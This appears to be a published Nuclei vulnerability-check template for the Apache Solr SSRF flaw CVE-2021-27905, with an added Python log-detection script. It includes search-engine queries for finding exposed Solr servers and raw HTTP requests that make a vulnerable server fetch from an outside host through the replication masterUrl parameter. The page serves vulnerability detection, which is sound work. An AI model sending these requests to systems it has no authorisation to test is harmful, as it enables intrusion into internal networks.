Apache Solr <=8.8.1 - Server-Side Request Forgery
ID: CVE-2021-27905
Severity: critical
Author: hackergautam
Tags: cve2021,cve,apache,solr,ssrf
Description
Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at “/replication” under a Solr core) has a “masterUrl” parameter (with a “leaderUrl” alias) that designates another ReplicationHandler on another Solr core from which index data is replicated into the local core. To prevent an SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the “shards” parameter.
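An added example (not part of the template or of Solr's code): a log-side check that flags ReplicationHandler fetchindex requests whose masterUrl or leaderUrl host is outside an allow-list, mirroring the check the description says Solr ought to perform. The allow-listed host name, the access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the only host this node may legitimately replicate from.
ALLOWED_LEADERS = {"solr-leader.internal.example"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
REPLICATION_RE = re.compile(r"^/solr/(?P<core>[^/]+)/replication/?$")


def suspicious_fetchindex(line, allowed=ALLOWED_LEADERS):
    """Return (core, param, url) if a fetchindex URL host is not allow-listed."""
    request = REQUEST_RE.search(line)
    if not request:
        return None
    target = urlsplit(request.group("target"))
    handler = REPLICATION_RE.match(target.path)
    if not handler:
        return None
    params = parse_qs(target.query)  # percent-decodes the values
    # Command compared case-insensitively, as a conservative choice.
    if "fetchindex" not in (c.lower() for c in params.get("command", [])):
        return None
    for name in ("masterUrl", "leaderUrl"):
        for url in params.get(name, []):
            try:
                host = urlsplit(url).hostname
            except ValueError:  # malformed URL: treat as not allow-listed
                host = None
            if host not in allowed:
                return handler.group("core"), name, url
    return None


def scan(lines):
    return [hit for hit in map(suspicious_fetchindex, lines) if hit]


# Constructed sample access-log lines, not taken from a real system.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /solr/core1/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /solr/products/replication?command=FetchIndex&leaderUrl=http%3A%2F%2F192.0.2.10%3A8080%2Fsolr%2Fx HTTP/1.1" 200 90',
    '10.0.0.5 - - [01/Jan/2024:10:05:00 +0000] "GET /solr/core1/replication?command=fetchindex&masterUrl=http://solr-leader.internal.example:8983/solr/core1 HTTP/1.1" 200 90',
    '10.0.0.5 - - [01/Jan/2024:10:06:00 +0000] "GET /solr/core1/replication?command=details HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for core, param, url in scan(SAMPLE_LOG):
        print(f"core={core} {param}={url}")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers query-string requests such as the ones the template sends.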
YAML Source
id: CVE-2021-27905

info:
  name: Apache Solr <=8.8.1 - Server-Side Request Forgery
  author: hackergautam
  severity: critical
  description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: This issue is resolved in Apache Solr 8.8.2 and later.
  reference:
    - https://www.anquanke.com/post/id/238201
    - https://ubuntu.com/security/CVE-2021-27905
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27905
    cwe-id: CWE-918
    epss-score: 0.94309
    epss-percentile: 0.99031
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query:
      - cpe:"cpe:2.3:a:apache:solr"
      - http.title:"apache solr"
      - http.title:"solr admin"
    fofa-query:
      - title="solr admin"
      - title="apache solr"
    google-query:
      - intitle:"apache solr"
      - intitle:"solr admin"
  tags: cve2021,cve,apache,solr,ssrf

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    matchers:
      - type: word
        part: body
        words:
          - '<str name="status">OK</str>'

    extractors:
      - type: regex
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
        internal: true
# digest: 4a0a0047304502200d991d93dedecb954be6128d73088a4d0a32de5e4ecc56019a69df9b4559d4710221008dfdbec1aa3e241ea161763a0c962bc2cf901d9bafc332387e3470990b5624f0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-27905.yaml"